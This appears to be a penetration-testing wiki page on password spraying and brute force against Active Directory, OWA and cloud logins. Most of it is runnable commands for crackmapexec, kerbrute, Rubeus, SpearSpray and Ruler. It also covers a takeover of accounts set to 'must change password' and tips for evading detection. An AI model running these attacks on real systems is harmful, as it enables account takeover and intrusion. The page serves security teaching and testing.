# Password Spraying / Brute Force

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## **Password Spraying**

Once you have found several **valid usernames** you can try the most **common passwords** (keep in mind the password policy of the environment) with each of the discovered users.\
By **default** the **minimum** **password** **length** is **7**.

Lists of common usernames could also be useful: [https://github.com/insidetrust/statistically-likely-usernames](https://github.com/insidetrust/statistically-likely-usernames)

Notice that you **could lockout some accounts if you try several wrong passwords** (by default more than 10).

### Get password policy

If you have some user credentials or a shell as a domain user you can **get the password policy with**:

```bash
# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol

enum4linux -u 'username' -p 'password' -P <IP>

rpcclient -U "" -N 10.10.10.10;
rpcclient $>querydominfo

ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

# From Windows
net accounts

(Get-DomainPolicy)."SystemAccess" #From powerview
```

### Exploitation from Linux (or all)

- Using **crackmapexec:**

```bash
crackmapexec smb <IP> -u users.txt -p passwords.txt
# Local Auth Spray (once you found some local admin pass or hash)
## --local-auth flag indicate to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
```

- Using [**kerbrute**](https://github.com/ropnop/kerbrute) (Go)

```bash
# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman
```

- [**spray**](https://github.com/Greenwolf/Spray) _**(you can indicate number of attempts to avoid lockouts):**_

```bash
spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
```

- Using [**kerbrute**](https://github.com/TarlogicSecurity/kerbrute) (python) - NOT RECOMMENDED SOMETIMES DOESN'T WORK

```bash
python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt
```

- With the `scanner/smb/smb_login` module of **Metasploit**:

![](<../../images/image (745).png>)

- Using **rpcclient**:

```bash
# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
for u in $(cat users.txt); do
    rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done
```

#### From Windows

- With [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module:

```bash
# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
```

- With [**Invoke-DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1) (It can generate users from the domain by default and it will get the password policy from the domain and limit tries according to it):

```bash
Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
```

- With [**Invoke-SprayEmptyPassword.ps1**](https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-SprayEmptyPassword.ps1)

```
Invoke-SprayEmptyPassword
```

### Identify and Take Over "Password must change at next logon" Accounts (SAMR)

A low-noise technique is to spray a benign/empty password and catch accounts returning STATUS_PASSWORD_MUST_CHANGE, which indicates the password was forcibly expired and can be changed without knowing the old one.

Workflow:
- Enumerate users (RID brute via SAMR) to build the target list:

{{#ref}}
../../network-services-pentesting/pentesting-smb/rpcclient-enumeration.md
{{#endref}}

```bash
# NetExec (null/guest) + RID brute to harvest users
netexec smb <dc_fqdn> -u '' -p '' --rid-brute | awk -F'\\\\| ' '/SidTypeUser/ {print $3}' > users.txt
```

- Spray an empty password and keep going on hits to capture accounts that must change at next logon:

```bash
# Will show valid, lockout, and STATUS_PASSWORD_MUST_CHANGE among results
netexec smb <DC.FQDN> -u users.txt -p '' --continue-on-success
```

- For each hit, change the password over SAMR with NetExec’s module (no old password needed when "must change" is set):

```bash
# Strong complexity to satisfy policy
env NEWPASS='P@ssw0rd!2025#' ; \
netexec smb <DC.FQDN> -u <User> -p '' -M change-password -o NEWPASS="$NEWPASS"

# Validate and retrieve domain password policy with the new creds
netexec smb <DC.FQDN> -u <User> -p "$NEWPASS" --pass-pol
```

Operational notes:
- Ensure your host clock is in sync with the DC before Kerberos-based operations: `sudo ntpdate <dc_fqdn>`.
- A [+] without (Pwn3d!) in some modules (e.g., RDP/WinRM) means the creds are valid but the account lacks interactive logon rights.

## Brute Force

```bash
legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org
```

### Kerberos pre-auth spraying with LDAP targeting and PSO-aware throttling (SpearSpray)

Kerberos pre-auth–based spraying reduces noise vs SMB/NTLM/LDAP bind attempts and aligns better with AD lockout policies. SpearSpray couples LDAP-driven targeting, a pattern engine, and policy awareness (domain policy + PSOs + badPwdCount buffer) to spray precisely and safely. It can also tag compromised principals in Neo4j for BloodHound pathing.

Key ideas:
- LDAP user discovery with paging and LDAPS support, optionally using custom LDAP filters.
- Domain lockout policy + PSO-aware filtering to leave a configurable attempt buffer (threshold) and avoid locking users.
- Kerberos pre-auth validation using fast gssapi bindings (generates 4768/4771 on DCs instead of 4625).
- Pattern-based, per-user password generation using variables like names and temporal values derived from each user’s pwdLastSet.
- Throughput control with threads, jitter, and max requests per second.
- Optional Neo4j integration to mark owned users for BloodHound.

Basic usage and discovery:

```bash
# List available pattern variables
spearspray -l

# Basic run (LDAP bind over TCP/389)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local

# LDAPS (TCP/636)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local --ssl
```

Targeting and pattern control:

```bash
# Custom LDAP filter (e.g., target specific OU/attributes)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local \
  -q "(&(objectCategory=person)(objectClass=user)(department=IT))"

# Use separators/suffixes and an org token consumed by patterns via {separator}/{suffix}/{extra}
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -sep @-_ -suf !? -x ACME
```

Stealth and safety controls:

```bash
# Control concurrency, add jitter, and cap request rate
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -t 5 -j 3,5 --max-rps 10

# Leave N attempts in reserve before lockout (default threshold: 2)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -thr 2
```

Neo4j/BloodHound enrichment:

```bash
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -nu neo4j -np bloodhound --uri bolt://localhost:7687
```

Pattern system overview (patterns.txt):

```text
# Example templates consuming per-user attributes and temporal context
{name}{separator}{year}{suffix}
{month_en}{separator}{short_year}{suffix}
{season_en}{separator}{year}{suffix}
{samaccountname}
{extra}{separator}{year}{suffix}
```

Available variables include:
- {name}, {samaccountname}
- Temporal from each user’s pwdLastSet (or whenCreated): {year}, {short_year}, {month_number}, {month_en}, {season_en}
- Composition helpers and org token: {separator}, {suffix}, {extra}

Operational notes:
- Favor querying the PDC-emulator with -dc to read the most authoritative badPwdCount and policy-related info.
- badPwdCount resets are triggered on the next attempt after the observation window; use threshold and timing to stay safe.
- Kerberos pre-auth attempts surface as 4768/4771 in DC telemetry; use jitter and rate-limiting to blend in.

> Tip: SpearSpray’s default LDAP page size is 200; adjust with -lps as needed.

## Outlook Web Access

There are multiples tools for p**assword spraying outlook**.

- With [MSF Owa_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_login/)
- with [MSF Owa_ews_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_ews_login/)
- With [Ruler](https://github.com/sensepost/ruler) (reliable!)
- With [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) (Powershell)
- With [MailSniper](https://github.com/dafthack/MailSniper) (Powershell)

To use any of these tools, you need a user list and a password / a small list of passwords to spray.

```bash
./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
    [x] Failed: larsson:Summer2020
    [x] Failed: cube0x0:Summer2020
    [x] Failed: a.admin:Summer2020
    [x] Failed: c.cube:Summer2020
    [+] Success: s.svensson:Summer2020
```

## Google

- [https://github.com/ustayready/CredKing/blob/master/credking.py](https://github.com/ustayready/CredKing/blob/master/credking.py)

## Okta

- [https://github.com/ustayready/CredKing/blob/master/credking.py](https://github.com/ustayready/CredKing/blob/master/credking.py)
- [https://github.com/Rhynorater/Okta-Password-Sprayer](https://github.com/Rhynorater/Okta-Password-Sprayer)
- [https://github.com/knavesec/CredMaster](https://github.com/knavesec/CredMaster)

## References

- [https://github.com/sikumy/spearspray](https://github.com/sikumy/spearspray)
- [https://github.com/TarlogicSecurity/kerbrute](https://github.com/TarlogicSecurity/kerbrute)
- [https://github.com/Greenwolf/Spray](https://github.com/Greenwolf/Spray)
- [https://github.com/Hackndo/sprayhound](https://github.com/Hackndo/sprayhound)
- [https://github.com/login-securite/conpass](https://github.com/login-securite/conpass)
- [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying)
- [https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell](https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell)
- [www.blackhillsinfosec.com/?p=5296](https://www.blackhillsinfosec.com/?p=5296)
- [https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying](https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying)
- [HTB Sendai – 0xdf: from spray to gMSA to DA/SYSTEM](https://0xdf.gitlab.io/2025/08/28/htb-sendai.html)


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